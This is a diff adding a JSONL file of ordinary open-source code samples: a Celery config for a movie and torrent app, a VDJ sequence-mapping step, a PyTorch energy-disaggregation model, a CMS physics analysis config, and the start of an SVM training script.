diff --git "a/6594.jsonl" "b/6594.jsonl" new file mode 100644--- /dev/null +++ "b/6594.jsonl" @@ -0,0 +1,590 @@ +{"seq_id":"209063347","text":"#-*- coding:utf-8 -*-\n\nimport os\nfrom datetime import timedelta\nfrom celery.utils import Exchange, Queue\nfrom celery.schedules import crontab\n\n\nclass BaseConfig(object):\n PROJECT = 'jotun'\n\n DEBUG = False\n TESTING = False\n\n APP_ROOT = os.path.dirname(os.path.abspath(__file__))\n LOGGING_ROOT = os.path.join(APP_ROOT, '..', 'logs')\n RUN_ROOT = os.path.join(APP_ROOT, '..', 'run')\n\n STATIC_ROOT = os.path.join(APP_ROOT, '..', 'static')\n MEDIA_ROOT = os.path.join(APP_ROOT, '..', 'media')\n POSTERS_ROOT = os.path.join(MEDIA_ROOT, 'posters')\n TORRENTS_ROOT = os.path.join(MEDIA_ROOT, 'torrents')\n\n MEDIA_URL = '/media/'\n\n INSTANCE_FOLDER_PATH = os.path.join(APP_ROOT, '..')\n\n API_VERSION = 'v1'\n\n API_RESOURCES = (\n 'app.movies.views.GenreItemResource',\n 'app.movies.views.GenreListResource',\n 'app.movies.views.GenreMoviesListResource',\n 'app.movies.views.MovieItemResource',\n 'app.movies.views.MovieListResource',\n 'app.movies.views.MovieGenresListResource',\n 'app.movies.views.MovieTorrentsResource',\n 'app.movies.views.RelatedMoviesListResource',\n 'app.torrents.views.DownloadTorrentItemResource',\n 'app.torrents.views.StartTorrentItemResource',\n 'app.torrents.views.StatusTorrentItemResource',\n 'app.torrents.views.StopTorrentItemResource',\n 'app.torrents.views.RemoveTorrentItemResource',\n 'app.torrents.views.TorrentItemResource',\n 'app.torrents.views.TorrentListResource',\n )\n\n BLUEPRINTS = (\n ('app.core.core', '/'),\n )\n\n CONTEXT_PROCESSORS = (\n 'app.core.context_processors.common_context',\n 'app.core.context_processors.navigation',\n )\n\n EXTENSIONS = (\n 'app.extensions.db',\n 'app.extensions.cache',\n 'app.extensions.redis',\n 'app.extensions.sentry',\n 'app.extensions.toolbar',\n 'app.core.init_login'\n )\n\n # Default cache settings\n CACHE_KEY_PREFIX = PROJECT\n CACHE_DEFAULT_TIMEOUT = 900\n\n # Celery settings\n CELERY_IMPORTS = (\n 'app.collection.tasks',\n 'app.movies.tasks',\n 'app.torrents.tasks'\n )\n\n CELERY_QUEUES = (\n Queue('default', Exchange('default', type='direct'),\n routing_key='default'),\n\n Queue('collection', Exchange('collection', type='direct'),\n routing_key='collection'),\n\n Queue('persons', Exchange('persons', type='direct'),\n routing_key='persons'),\n Queue('movies', Exchange('movies', type='direct'),\n routing_key='movies'),\n Queue('relations', Exchange('relations', type='direct'),\n routing_key='relations'),\n\n Queue('torrents', Exchange('torrents', type='direct'),\n routing_key='torrents')\n )\n\n CELERY_DEFAULT_QUEUE = 'default'\n CELERY_DEFAULT_EXCHANGE = 'default'\n CELERY_DEFAULT_ROUTING_KEY = 'default'\n\n CELERYBEAT_SCHEDULE = {\n # 'process_not_added_actors': {\n # 'task': 'app.movies.tasks.process_queue',\n # 'schedule': crontab(minute='*/1'),\n # 'args': (10, 'not_added_actors', 'not added actors'),\n # 'options': {'queue': 'persons'}\n # },\n # 'process_not_added_directors': {\n # 'task': 'app.movies.tasks.process_queue',\n # 'schedule': crontab(minute='*/1'),\n # 'args': (10, 'not_added_directors', 'not added directors'),\n # 'options': {'queue': 'persons'}\n # },\n 'process_not_added_movies': {\n 'task': 'app.movies.tasks.process_queue',\n 'schedule': crontab(minute='*/1'),\n 'kwargs': {\n 'count': 20,\n 'queue': 'not_added_movies',\n 'title': 'not added movies',\n },\n 'options': {'queue': 'movies'}\n },\n # 'process_person_relations': {\n # 'task': 
'app.movies.tasks.process_queue',\n # 'schedule': crontab(minute='*/5'),\n # 'args': (5, 'not_saved_persons_relations', 'person relations'),\n # 'options': {'queue': 'relations'}\n # },\n 'process_movie_relations': {\n 'task': 'app.movies.tasks.process_queue',\n 'schedule': crontab(minute='*/1'),\n 'kwargs': {\n 'count': 20,\n 'queue': 'not_saved_movie_relations',\n 'title': 'movie relations',\n 'add_missing': False\n },\n 'options': {'queue': 'relations'}\n }\n }\n\n # Logging settings\n LOGGING = {\n 'version': 1,\n 'formatters': {\n 'verbose': {\n 'format': '%(levelname)s %(asctime)s %(module)s %(message)s'\n },\n 'simple': {\n 'format': '%(levelname)s %(message)s'\n }\n },\n 'handlers': {\n 'file': {\n 'level': 'INFO',\n 'class': 'logging.FileHandler',\n 'filename': os.path.join(LOGGING_ROOT, 'app.log'),\n },\n 'console': {\n 'level': 'DEBUG',\n 'class': 'logging.StreamHandler',\n 'formatter': 'verbose'\n }\n },\n 'loggers': {\n 'app': {\n 'handlers': ['console', ],\n 'level': 'DEBUG',\n 'propagate': False,\n },\n }\n }\n","sub_path":"app/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":5429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"572488675","text":"'''\nvdj mapping\n'''\n\nimport subprocess\n\nimport pandas as pd\nimport pysam\n\nfrom celescope.tools.step import Step, s_common\nfrom celescope.vdj.__init__ import CHAINS\nimport celescope.tools.utils as utils\n\n\n@utils.add_log\ndef summary(input_file, alignments, receptor_type, outdir, sample, not_consensus):\n chains = CHAINS[receptor_type]\n\n '''\n # out files\n UMI_unfiltered_file = f'{outdir}/{sample}_UMI_unfiltered.tsv'\n UMI_filtered1_file = f'{outdir}/{sample}_UMI_filtered1.tsv'\n UMI_filtered2_file = f'{outdir}/{sample}_UMI_filtered2.tsv'\n '''\n\n UMI_count_unfiltered_file = f'{outdir}/{sample}_UMI_count_unfiltered.tsv'\n UMI_count_filtered1_file = f'{outdir}/{sample}_UMI_count_filtered1.tsv'\n\n stat_prefix = 'UMIs'\n if not_consensus:\n stat_prefix = 'Reads'\n\n # read input_file\n with pysam.FastxFile(input_file) as fh:\n index = 0\n read_row_list = []\n for entry in fh:\n attr = entry.name.split(\"_\")\n barcode = attr[0]\n umi = attr[1]\n dic = {\"readId\": index, \"barcode\": barcode, \"UMI\": umi}\n read_row_list.append(dic)\n index += 1\n df_read = pd.DataFrame(read_row_list, columns=[\"readId\", \"barcode\", \"UMI\"])\n summary.logger.info(f\"{input_file} to dataframe done.\")\n total_read = df_read.shape[0]\n\n # init row list\n mapping_summary_row_list = []\n\n # mapped\n alignment = pd.read_csv(alignments, sep=\"\\t\")\n alignment.readId = alignment.readId.astype(int)\n align_read = alignment.shape[0]\n df_read.readId = df_read.readId.astype(int)\n df_align = pd.merge(df_read, alignment, on=\"readId\", how=\"right\")\n\n mapping_summary_row_list.append({\n \"item\": f\"{stat_prefix} Mapped to Any VDJ Gene\",\n \"count\": align_read,\n \"total_count\": total_read,\n })\n\n # CDR3\n df_CDR3 = df_align[~pd.isnull(df_align[\"aaSeqCDR3\"])]\n align_read_with_CDR3 = df_CDR3.shape[0]\n mapping_summary_row_list.append({\n \"item\": f\"{stat_prefix} with CDR3\",\n \"count\": align_read_with_CDR3,\n \"total_count\": total_read,\n })\n\n # correct CDR3\n df_correct_CDR3 = df_CDR3[~(df_CDR3[\"aaSeqCDR3\"].str.contains(r\"\\*\"))]\n align_read_with_correct_CDR3 = df_correct_CDR3.shape[0]\n mapping_summary_row_list.append({\n \"item\": f\"{stat_prefix} with Correct CDR3\",\n \"count\": align_read_with_correct_CDR3,\n \"total_count\": 
total_read,\n })\n\n # VDJ\n df_VJ = df_correct_CDR3[\n (~pd.isnull(df_correct_CDR3['bestVGene'])) &\n (~pd.isnull(df_correct_CDR3['bestJGene']))\n ]\n df_VJ = df_VJ[df_VJ.bestVGene.str[:3] == df_VJ.bestJGene.str[:3]]\n df_VJ[\"chain\"] = df_VJ.bestVGene.str[:3]\n df_VJ[\"VJ_pair\"] = df_VJ[\"bestVGene\"] + \"_\" + df_VJ[\"bestJGene\"]\n Reads_Mapped_Confidently_to_VJ_Gene = df_VJ.shape[0]\n mapping_summary_row_list.append({\n \"item\": f\"{stat_prefix} Mapped Confidently to VJ Gene\",\n \"count\": Reads_Mapped_Confidently_to_VJ_Gene,\n \"total_count\": total_read\n })\n\n # chain\n for chain in chains:\n df_chain = df_VJ[df_VJ.chain == chain]\n Reads_Mapped_to_chain = df_chain.shape[0]\n mapping_summary_row_list.append({\n \"item\": f\"{stat_prefix} Mapped to {chain}\",\n \"count\": Reads_Mapped_to_chain,\n \"total_count\": total_read,\n })\n\n # unique UMI\n df_UMI = df_VJ.drop_duplicates(subset=[\"barcode\", \"UMI\"], keep=\"first\")\n\n # filter1: keep top 1 in each combinations\n groupby_elements = [\n 'barcode',\n 'chain',\n 'bestVGene',\n 'bestJGene',\n 'aaSeqCDR3',\n 'nSeqCDR3',\n ]\n df_UMI_count = df_UMI.groupby(\n groupby_elements, as_index=False).agg({\"UMI\": \"count\"})\n df_UMI_count = df_UMI_count.sort_values(\"UMI\", ascending=False)\n # out unfiltered\n df_UMI_count.to_csv(UMI_count_unfiltered_file, sep=\"\\t\", index=False)\n\n df_UMI_count_filter1 = df_UMI_count.groupby(\n [\"barcode\", \"chain\"], as_index=False).head(1)\n # out filtered1\n df_UMI_count_filter1.to_csv(\n UMI_count_filtered1_file,\n sep=\"\\t\",\n index=False)\n\n '''\n #TODO\n if debug:\n unique_UMI = df_UMI.shape[0]\n mapping_summary_row_list.append({\n \"item\": \"UMI unique count\",\n \"count\": unique_UMI,\n \"total_count\": align_read_with_correct_CDR3,\n })\n UMI_after_Contamination_Filtering = df_UMI_count.filter1.UMI.sum()\n mapping_summary_row_list.append({\n \"item\": \"UMI after Contamination Filtering\",\n \"count\": UMI_after_Contamination_Filtering,\n \"total_count\": unique_UMI,\n })\n '''\n\n # stat file\n df = pd.DataFrame(\n mapping_summary_row_list,\n columns=[\n \"item\",\n \"count\",\n \"total_count\"])\n stat_file = f'{outdir}/stat.txt'\n utils.gen_stat(df, stat_file)\n\n\n@utils.add_log \ndef mixcr(outdir, sample, input_file, thread, species):\n report = f\"{outdir}/{sample}_align.txt\"\n not_align_fq = f\"{outdir}/not_align.fq\"\n read2_vdjca = f\"{outdir}/read2.vdjca\"\n alignments = f\"{outdir}/{sample}_alignments.txt\"\n\n cmd = f\"\"\"\nmixcr align \\\n--force-overwrite \\\n--species {species} \\\n-t {thread} \\\n--not-aligned-R1 {not_align_fq} \\\n--report {report} \\\n-OallowPartialAlignments=true \\\n-OvParameters.geneFeatureToAlign=VTranscriptWithP \\\n{input_file} \\\n{read2_vdjca}\nmixcr exportAlignments \\\n{read2_vdjca} {alignments} \\\n-readIds --force-overwrite -vGene -dGene -jGene -cGene \\\n-nFeature CDR3 -aaFeature CDR3\\n\"\"\"\n mixcr.logger.info(cmd)\n subprocess.check_call(cmd, shell=True)\n return alignments\n\n\n@utils.add_log\ndef mapping_vdj(args):\n\n step_name = f\"{args.type}_mapping_vdj\"\n step = Step(args, step_name)\n\n sample = args.sample\n outdir = args.outdir\n fq = args.fq\n receptor_type = args.type\n thread = int(args.thread)\n not_consensus = args.not_consensus\n species = args.species\n\n input_file = fq\n alignments = mixcr(outdir, sample, input_file, thread, species)\n\n # summary\n summary(input_file, alignments, receptor_type, outdir, sample, not_consensus)\n\n step.clean_up()\n\n\n\ndef get_opts_mapping_vdj(parser, sub_program):\n 
parser.add_argument(\"--type\", help='TCR or BCR', required=True)\n parser.add_argument('--species', choices=['hs', 'mmu'], help='human or mouse', default='hs')\n parser.add_argument(\"--not_consensus\", action='store_true', help=\"input fastq is not consensus\")\n if sub_program:\n parser = s_common(parser)\n parser.add_argument(\"--fq\", required=True)\n\n","sub_path":"celescope/vdj/mapping_vdj.py","file_name":"mapping_vdj.py","file_ext":"py","file_size_in_byte":6610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"9888198","text":"# Package import\nfrom __future__ import print_function, division\nfrom warnings import warn\nfrom nilmtk.disaggregate import Disaggregator\nimport pandas as pd\nimport numpy as np\nfrom collections import OrderedDict \nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import train_test_split\nfrom statistics import mean\nimport os\nimport time\nimport pickle\nimport random\nimport json\nimport torch\nfrom torchsummary import summary\nimport torch.nn as nn\nimport torch.utils.data as tud\nfrom torch.utils.data.dataset import TensorDataset\nfrom torch.utils.tensorboard import SummaryWriter\n\n# Fix the random seed to ensure the reproducibility of the experiment\nrandom_seed = 10\nrandom.seed(random_seed)\nnp.random.seed(random_seed)\ntorch.manual_seed(random_seed)\ntorch.cuda.manual_seed_all(random_seed)\n\ntorch.backends.cudnn.deterministic = True\ntorch.backends.cudnn.benchmark = False\n\n# Use cuda or not\nUSE_CUDA = torch.cuda.is_available()\n\nclass DAE_Pytorch_MultiChannel(nn.Module):\n def __init__(self, sequence_length, ndim = 2):\n # Refer to \"KELLY J, KNOTTENBELT W. Neural NILM: Deep neural networks applied to energy disaggregation[C].The 2nd ACM International Conference on Embedded Systems for Energy-Efficient Built Environments\".\n super(DAE_Pytorch_MultiChannel, self).__init__()\n self.sequence_length = sequence_length\n self.conv_1 = nn.Conv1d(ndim, 8, 4, stride = 1)\n self.dense = nn.Sequential(nn.Linear(8 * (sequence_length - 3), 8 * (sequence_length - 3)),nn.ReLU(True), \n nn.Linear(8 * (sequence_length - 3), 128), nn.ReLU(True), nn.Linear(128, 8 * (sequence_length - 3)), nn.ReLU(True))\n self.deconv_2 = nn.ConvTranspose1d(8, 1, 4, stride = 1)\n\n def forward(self,power_seq):\n inp = self.conv_1(power_seq).view(power_seq.size(0), -1)\n tmp = self.dense(inp).view(power_seq.size(0), 8, -1)\n out = self.deconv_2(tmp)\n return out\n\ndef initialize(layer):\n # Xavier_uniform will be applied to conv1d and dense layer, to be consistent with Keras and Tensorflow\n if isinstance(layer,nn.Conv1d) or isinstance(layer, nn.Linear) or isinstance(layer, nn.ConvTranspose1d): \n torch.nn.init.xavier_uniform_(layer.weight.data)\n if layer.bias is not None:\n torch.nn.init.constant_(layer.bias.data, val = 0.0)\n\ndef train(appliance_name,model, mains, appliance, epochs, batch_size, pretrain, checkpoint_interval = None, train_patience = 3):\n # Model configuration\n if USE_CUDA:\n model = model.cuda()\n if not pretrain:\n model.apply(initialize)\n # summary(model, (1, mains.shape[1]))\n # Split the train and validation set\n train_mains,valid_mains,train_appliance,valid_appliance = train_test_split(mains, appliance, test_size=.2, random_state = random_seed)\n\n # Create optimizer, loss function, and dataloader\n optimizer = torch.optim.Adam(model.parameters(), lr = 1e-3)\n loss_fn = torch.nn.MSELoss(reduction = 'mean')\n\n train_dataset = 
TensorDataset(torch.from_numpy(train_mains).float().permute(0,2,1), torch.from_numpy(train_appliance).float().permute(0,2,1))\n train_loader = tud.DataLoader(train_dataset, batch_size = batch_size, shuffle = True, num_workers = 0, drop_last = True)\n\n valid_dataset = TensorDataset(torch.from_numpy(valid_mains).float().permute(0,2,1), torch.from_numpy(valid_appliance).float().permute(0,2,1))\n valid_loader = tud.DataLoader(valid_dataset, batch_size = batch_size, shuffle = True, num_workers = 0, drop_last = True)\n\n writer = SummaryWriter(comment = 'train_visual')\n patience, best_loss = 0, None\n\n for epoch in range(epochs):\n # Earlystopping\n if(patience == train_patience):\n print(\"val_loss did not improve after {} Epochs, thus Earlystopping is calling\".format(train_patience))\n break \n # Train the model\n st = time.time() \n model.train()\n \n for i, (batch_mains, batch_appliance) in enumerate(train_loader):\n if USE_CUDA:\n batch_mains = batch_mains.cuda()\n batch_appliance = batch_appliance.cuda()\n \n batch_pred = model(batch_mains)\n loss = loss_fn(batch_pred, batch_appliance)\n\n model.zero_grad() \n loss.backward()\n optimizer.step()\n ed = time.time()\n\n # Evaluate the model \n model.eval()\n with torch.no_grad():\n cnt, loss_sum = 0, 0\n for i, (batch_mains, batch_appliance) in enumerate(valid_loader):\n if USE_CUDA:\n batch_mains = batch_mains.cuda()\n batch_appliance = batch_appliance.cuda()\n \n batch_pred = model(batch_mains)\n loss = loss_fn(batch_appliance, batch_pred)\n loss_sum += loss\n cnt += 1 \n\n final_loss = loss_sum / cnt\n # Save best only\n if best_loss is None or final_loss < best_loss:\n best_loss = final_loss\n patience = 0\n net_state_dict = model.state_dict()\n path_state_dict = \"./\"+appliance_name+\"_mul_dae_best_state_dict.pt\"\n torch.save(net_state_dict, path_state_dict)\n else:\n patience = patience + 1 \n\n print(\"Epoch: {}, Valid_Loss: {}, Time consumption: {}s.\".format(epoch, final_loss, ed - st))\n # For the visualization of training process\n for name,param in model.named_parameters():\n writer.add_histogram(name + '_grad', param.grad, epoch)\n writer.add_histogram(name + '_data', param, epoch)\n writer.add_scalars(\"MSELoss\", {\"Valid\":final_loss}, epoch)\n\n # Save checkpoint\n if (checkpoint_interval != None) and ((epoch + 1) % checkpoint_interval == 0):\n checkpoint = {\"model_state_dict\": model.state_dict(),\n \"optimizer_state_dict\": optimizer.state_dict(),\n \"epoch\": epoch}\n path_checkpoint = \"./\"+appliance_name+\"_mul_dae_checkpoint_{}_epoch.pt\".format(epoch)\n torch.save(checkpoint, path_checkpoint)\n\ndef test(model, test_mains, batch_size = 512):\n # Model test\n st = time.time()\n model.eval()\n # Create test dataset and dataloader\n batch_size = test_mains.shape[0] if batch_size > test_mains.shape[0] else batch_size\n test_dataset = TensorDataset(torch.from_numpy(test_mains).float().permute(0,2,1))\n test_loader = tud.DataLoader(test_dataset, batch_size = batch_size, shuffle = False, num_workers = 0)\n with torch.no_grad():\n for i, batch_mains in enumerate(test_loader):\n batch_pred = model(batch_mains[0])\n if i == 0:\n res = batch_pred\n else:\n res = torch.cat((res, batch_pred), dim = 0)\n ed = time.time()\n print(\"Inference Time consumption: {}s.\".format(ed - st))\n return res.numpy()\n\n\nclass MUL_DAE(Disaggregator): \n def __init__(self, params):\n self.MODEL_NAME = \"MUL_DAE\"\n self.sequence_length = params.get('sequence_length',129)\n self.n_epochs = params.get('n_epochs', 10)\n self.batch_size = 
params.get('batch_size',512)\n self.appliance_params = params.get('appliance_params',{})\n self.mains_mean = params.get('mains_mean',None)\n self.mains_std = params.get('mains_std',None)\n self.models = OrderedDict() \n \n def partial_fit(self, train_main, train_appliances, pretrain = False, do_preprocessing=True,pretrain_path = \"./dae_pre_state_dict.pkl\",**load_kwargs): \n # If no appliance wise parameters are specified, then they are computed from the data\n if len(self.appliance_params) == 0:\n self.set_appliance_params(train_appliances)\n\n # print(train_main[0].shape) # (1440, 2)\n # Preprocess the data and bring it to a valid shape\n if do_preprocessing:\n print (\"Doing Preprocessing\")\n train_main,train_appliances = self.call_preprocessing(train_main,train_appliances,'train')\n # print(train_main.shape)\n train_main = np.concatenate(train_main, axis = 0)\n # train_main = train_main.reshape((-1,self.sequence_length,1))\n\n new_train_appliances = []\n for app_name, app_arr in train_appliances:\n app_arr = np.concatenate(app_arr, axis=0)\n # print(app_arr.shape)\n # app_df = app_df.reshape((-1,self.sequence_length,1))\n new_train_appliances.append((app_name, app_arr))\n train_appliances = new_train_appliances\n for appliance_name, power in train_appliances:\n if appliance_name not in self.models:\n print (\"First model training for \",appliance_name)\n self.models[appliance_name] = DAE_Pytorch_MultiChannel(self.sequence_length, train_main.shape[2])\n # Load pretrain dict or not\n if pretrain is True:\n self.models[appliance_name].load_state_dict(torch.load(\"./\"+appliance_name+\"_mul_dae_pre_state_dict.pt\"))\n \n model = self.models[appliance_name]\n train(appliance_name, model, train_main, power, self.n_epochs, self.batch_size, pretrain)\n # Model test will be based on the best model\n self.models[appliance_name].load_state_dict(torch.load(\"./\"+appliance_name+\"_mul_dae_best_state_dict.pt\"))\n\n\n def disaggregate_chunk(self, test_main_list, do_preprocessing = True):\n # Disaggregate (test process)\n if do_preprocessing:\n test_main_list = self.call_preprocessing(test_main_list,submeters_lst = None,method='test')\n\n test_predictions = []\n for test_main in test_main_list:\n # test_main = test_main.values.reshape((-1,self.sequence_length,1))\n disggregation_dict = {}\n\n for appliance in self.models:\n # Move the model to cpu, and then test it\n model = self.models[appliance].to('cpu')\n prediction = test(model, test_main)\n app_mean, app_std = self.appliance_params[appliance]['mean'], self.appliance_params[appliance]['std']\n prediction = self.denormalize_output(prediction,app_mean,app_std)\n valid_predictions = prediction.flatten()\n valid_predictions = np.where(valid_predictions > 0, valid_predictions, 0)\n series = pd.Series(valid_predictions)\n disggregation_dict[appliance] = series\n results = pd.DataFrame(disggregation_dict, dtype = 'float32')\n test_predictions.append(results)\n return test_predictions\n\n def call_preprocessing(self, mains_lst, submeters_lst, method):\n # Seq2Seq Version\n sequence_length = self.sequence_length\n if method=='train':\n # Preprocess the main and appliance data, the parameter 'overlapping' will be set 'True'\n processed_mains = []\n for mains in mains_lst:\n self.mains_mean, self.mains_std = mains.values.mean(), mains.values.std() \n mains = self.normalize_data(mains.values,sequence_length, True)\n processed_mains.append(mains)\n\n tuples_of_appliances = []\n for (appliance_name,app_df_list) in submeters_lst:\n app_mean = 
self.appliance_params[appliance_name]['mean']\n app_std = self.appliance_params[appliance_name]['std']\n processed_app_dfs = []\n for app_df in app_df_list:\n data = self.normalize_data(app_df.values, sequence_length, True)\n processed_app_dfs.append(data) \n tuples_of_appliances.append((appliance_name, processed_app_dfs))\n\n return processed_mains, tuples_of_appliances\n\n if method=='test':\n # Preprocess the main data only, the parameter 'overlapping' will be set 'False'\n processed_mains = []\n for mains in mains_lst: \n mains = self.normalize_data(mains.values,sequence_length, False)\n processed_mains.append(mains)\n return processed_mains\n \n def normalize_data(self,data,sequence_length, overlapping = False):\n # If you want to train the model,then overlapping = True will bring you a lot more training data; else overlapping = false to disaggregate the mains data\n n = sequence_length\n excess_entries = sequence_length - (data.shape[0] % sequence_length) \n windowed_x_all = []\n for i in range(data.shape[1]):\n lst = np.array([0] * excess_entries)\n arr = np.concatenate((data[:,i].flatten(), lst), axis = 0) \n mean, std = np.mean(data[:,i]), np.std(data[:,i])\n if overlapping:\n windowed_x = np.array([arr[j:j + n] for j in range(len(arr)-n+1)])\n else:\n windowed_x = arr.reshape((-1,sequence_length))\n # print(windowed_x.shape)\n windowed_x = (windowed_x - mean) / std\n windowed_x_all.append(windowed_x.reshape(-1, n, 1))\n windowed_x_all = np.concatenate(windowed_x_all, axis = 2)\n return windowed_x_all\n\n def denormalize_output(self,data,mean,std):\n # x = y * std + mean\n return mean + data * std\n \n def set_appliance_params(self,train_appliances):\n # Set appliance mean and std to normalize the label(appliance data)\n for (app_name, df_list) in train_appliances:\n l = np.array(pd.concat(df_list, axis=0))\n app_mean = np.mean(l)\n app_std = np.std(l)\n self.appliance_params.update({app_name:{'mean':app_mean,'std':app_std}})\n","sub_path":"nilmtk/disaggregate/dae_pytorch_multidim.py","file_name":"dae_pytorch_multidim.py","file_ext":"py","file_size_in_byte":13796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"606241410","text":"from PhysicsTools.PatAlgos.patTemplate_cfg import *\nfrom PhysicsTools.PatAlgos.tools.coreTools import *\nfrom PhysicsTools.PatAlgos.tools.trigTools import switchOnTrigger\nfrom PhysicsTools.PatAlgos.tools.metTools import addPfMET\nfrom PhysicsTools.PatAlgos.tools.pfTools import addPFCandidates\nfrom PhysicsTools.PatAlgos.tools.pfTools import *\n\ndef common_config(process, reportEveryNum=100, maxEvents=-1, runOnData=False) :\n usePFIso( process )\n if runOnData:\n removeMCMatching(process, ['All'])\n\n process.patElectrons.pfElectronSource = 'particleFlow'\n addPfMET(process, 'PF')\n\n switchOnTrigger(process)\n process.patTrigger.addL1Algos = cms.bool(True)\n \n # this is needed so we can correct the pfMET by adjusting the e/mu-pt\n # when switching to one of the dedicated Heep/TeV muon reconstructors\n addPFCandidates(process, 'particleFlow')\n process.selectedPatPFParticles.cut = \"abs(pdgId())==11 || abs(pdgId())==13\"\n\n process.load(\"FWCore.MessageLogger.MessageLogger_cfi\")\n process.MessageLogger.cerr.FwkReport.reportEvery = reportEveryNum\n\n process.maxEvents.input = maxEvents ## (e.g. 
-1 to run on all events)\n# process.GlobalTag.globaltag = cms.string('GR_R_52_V8::All')\n process.GlobalTag.globaltag = cms.string('FT53_V21A_AN6::All')\n # ##\n process.out.outputCommands = [\n # GEN\n 'keep *_prunedGenParticles_*_*',\n 'keep GenEventInfoProduct_*_*_*',\n 'keep GenRunInfoProduct_*_*_*',\n # TRIGGER\n 'keep edmTriggerResults_TriggerResults*_*_*',\n 'keep *_hltTriggerSummaryAOD_*_*',\n 'keep L1GlobalTriggerReadoutRecord_gtDigis_*_*',\n 'keep *_userPat*_*_*',\n 'keep *_patTrigger_*_*',\n 'keep *_patTriggerEvent_*_*',\n # PILEUP\n 'keep *_addPileupInfo_*_*', \n # PF CANDS\n 'keep *_selectedPatPFParticles*_*_*'\n ]\n \n## (to suppress the long output at the end of the job) \n process.options.wantSummary = True \n\n\ndef common_filters(process) :\n ##Common Filters ############\n #CSC\n process.load('RecoMET.METAnalyzers.CSCHaloFilter_cfi')\n process.p *= process.CSCTightHaloFilter\n \n #HBHE\n process.load('CommonTools/RecoAlgos/HBHENoiseFilter_cfi')\n process.p *= process.HBHENoiseFilter\n\n #HCAL Laser\n process.load(\"RecoMET.METFilters.hcalLaserEventFilter_cfi\")\n process.p *= process.hcalLaserEventFilter\n\n #ECAL deal cell TP\n process.load('RecoMET.METFilters.EcalDeadCellTriggerPrimitiveFilter_cfi')\n ## For AOD and RECO recommendation to use recovered rechits\n process.EcalDeadCellTriggerPrimitiveFilter.tpDigiCollection = cms.InputTag(\"ecalTPSkimNA\")\n\n # The section below is for the filter on Boundary Energy. Available in AOD in CMSSW>44x\n process.load('RecoMET.METFilters.EcalDeadCellBoundaryEnergyFilter_cfi')\n process.EcalDeadCellBoundaryEnergyFilter.taggingMode = cms.bool(False)\n process.EcalDeadCellBoundaryEnergyFilter.cutBoundEnergyDeadCellsEB=cms.untracked.double(10)\n process.EcalDeadCellBoundaryEnergyFilter.cutBoundEnergyDeadCellsEE=cms.untracked.double(10)\n process.EcalDeadCellBoundaryEnergyFilter.cutBoundEnergyGapEB=cms.untracked.double(100)\n process.EcalDeadCellBoundaryEnergyFilter.cutBoundEnergyGapEE=cms.untracked.double(100)\n process.EcalDeadCellBoundaryEnergyFilter.enableGap=cms.untracked.bool(False)\n process.EcalDeadCellBoundaryEnergyFilter.limitDeadCellToChannelStatusEB = cms.vint32(12,14)\n process.EcalDeadCellBoundaryEnergyFilter.limitDeadCellToChannelStatusEE = cms.vint32(12,14)\n # End of Boundary Energy filter configuration\n\n # The line below is the default recommendation\n process.p *= process.EcalDeadCellTriggerPrimitiveFilter\n\n #Tracking Failure\n process.goodVertices = cms.EDFilter(\n \"VertexSelector\",\n filter = cms.bool(False),\n src = cms.InputTag(\"offlinePrimaryVertices\"),\n cut = cms.string(\"!isFake && ndof > 4 && abs(z) <= 24 && position.rho < 2\")\n )\n\n process.load('RecoMET.METFilters.trackingFailureFilter_cfi')\n process.out.outputCommands.append('keep *_goodVertices_*_*')\n\n process.p *= process.goodVertices*process.trackingFailureFilter\n\n #Bad EE SC\n process.load('RecoMET.METFilters.eeBadScFilter_cfi')\n\n process.p *= process.eeBadScFilter\n\n #ECAL Laser\n\n #Tracking POG\n","sub_path":"WZSkimProduction/python/patTuple_common_cfg.py","file_name":"patTuple_common_cfg.py","file_ext":"py","file_size_in_byte":4405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"556994630","text":"import numpy as np\nfrom scipy.misc import imread\nfrom scipy.misc import imresize\nimport numpy.matlib\nimport scipy.io as sio\nimport os\nimport cv2\nimport matplotlib.pyplot as plt\nimport dlib\nimport requests\nfrom PIL import Image\nfrom imutils import face_utils\nimport 
matplotlib.path as mpltPath\nimport csv\nfrom concurrent.futures import ThreadPoolExecutor, wait, as_completed\nimport threading\nfrom sklearn.cross_validation import train_test_split\n\nfullpathprocessed = '/Users/clmeiste/TimAikenDocs/SeniorProject/Database/Processed/featurevectors/'\nfullpathSVM = '/Users/clmeiste/TimAikenDocs/SeniorProject/Classifiers/SVM/'\n \nqualityBad = fullpathprocessed + 'qualityBad.bin'\nqualityOK = fullpathprocessed + 'qualityOk.bin'\nqualitySVMradial = fullpathSVM + 'qualityRBF.xml'\nqualitySVMlinear = fullpathSVM + 'qualityLinear.xml'\n \ncontrastBad = fullpathprocessed + 'constrastBad.bin'\ncontrastOK = fullpathprocessed + 'constrastOK.bin'\ncontrastSVMradial = fullpathSVM + 'contrastRBF.xml'\ncontrastSVMlinear = fullpathSVM + 'contrastLinear.xml'\n \ndarkBad = fullpathprocessed + 'darkBad.bin'\ndarkOK = fullpathprocessed + 'darkOK.bin'\ndarkSVMradial = fullpathSVM + 'darkRBF.xml'\ndarkSVMlinear = fullpathSVM + 'darkLinear.xml'\n \neyesBad = fullpathprocessed + 'eyesBad.bin'\neyesOK = fullpathprocessed + 'eyesOK.bin'\neyesSVMradial = fullpathSVM + 'eyesRBF.xml'\neyesSVMlinear = fullpathSVM + 'eyesLinear.xml'\n \nflatBad = fullpathprocessed + 'flatBad.bin'\nflatOK = fullpathprocessed + 'flatOK.bin'\nflatSVMradial = fullpathSVM + 'flatRBF.xml'\nflatSVMlinear = fullpathSVM + 'flatLinear.xml'\n\ndef createRadialSVMs():\n trainSVMRadial(flatBad, flatOK, flatSVMradial)\n trainSVMRadial(eyesBad, eyesOK, eyesSVMradial)\n trainSVMRadial(darkBad, darkOK, darkSVMradial)\n trainSVMRadial(contrastBad, contrastOK, contrastSVMradial)\n trainSVMRadial(qualityBad, qualityOK, qualitySVMradial)\n\ndef trainSVMRadial(badfile, okfile, saveLocation):\n \n badData = np.fromfile(badfile).reshape((-1, 8))\n badDataTraining = badData[0:int(badData.shape[0] * 0.8),:]\n badClassTraining = 